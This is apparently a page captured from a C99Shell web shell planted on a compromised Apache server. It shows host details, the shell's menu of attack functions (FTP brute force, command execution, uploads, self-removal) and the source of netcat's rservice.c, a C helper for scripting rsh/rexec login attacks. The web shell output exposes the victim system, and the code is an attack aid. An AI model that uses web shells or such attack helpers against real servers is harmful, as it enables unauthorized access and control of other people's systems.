!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g. PHP/5.2.4-2ubuntu5.12 

uname -a: Linux forum.circlefusion.com 2.6.24-19-server #1 SMP Wed Jun 18 15:18:00 UTC 2008 i686 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/doc/netcat-traditional/examples/data/   drwxr-xr-x
Free 11.22 GB of 97.11 GB (11.55%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     rservice.c (1.41 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* generate ^@string1^@string2^@cmd^@ input to netcat, for scripting up
   rsh/rexec attacks.  Needs to be a prog because shells strip out nulls.

   args:
    locuser remuser [cmd]
    remuser passwd [cmd]

   cmd defaults to "pwd".

   ... whatever.  _H*/

#include <stdio.h>

/* change if you like; "id" is a good one for figuring out if you won too */
static char cmd[] = "pwd";

static char buf [4096];

main(argc, argv)
  int argc;
  char * argv[];
{
  register int x;
  register int y;
  char * p;
  char * q;

  p = buf;
  memset (buf, 0, sizeof (buf));

  p++;                /* first null */
  y = 1;

  if (! argv[1])
    goto wrong;
  strncpy (p, argv[1], sizeof (buf) - y); /* first arg plus another null */
  x = strlen (argv[1]) + 1;
  p += x;
  y += x;
  if (y >= sizeof (buf))
    goto over;

  if (! argv[2])
    goto wrong;
  strncpy (p, argv[2], sizeof (buf) - y);    /* second arg plus null */
  x = strlen (argv[2]) + 1;
  p += x;
  y += x;
  if (y >= sizeof (buf))
    goto over;

  q = cmd;
  if (argv[3])
    q = argv[3];
  strncpy (p, q, sizeof (buf) - y); /* the command, plus final null */
  x = strlen (q) + 1;
  p += x;
  y += x;
  if (y >= sizeof (buf))
    goto over;

  strncpy (p, "\n", sizeof (buf) - y); /* and a newline, so it goes */
  y++;

  write (1, buf, y);        /* zot! */
  exit (0);

wrong:
  fprintf (stderr, "wrong!  needs 2 or more args.\n");
  exit (1);

over:
  fprintf (stderr, "out of memory!\n");
  exit (1);
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0049 ]--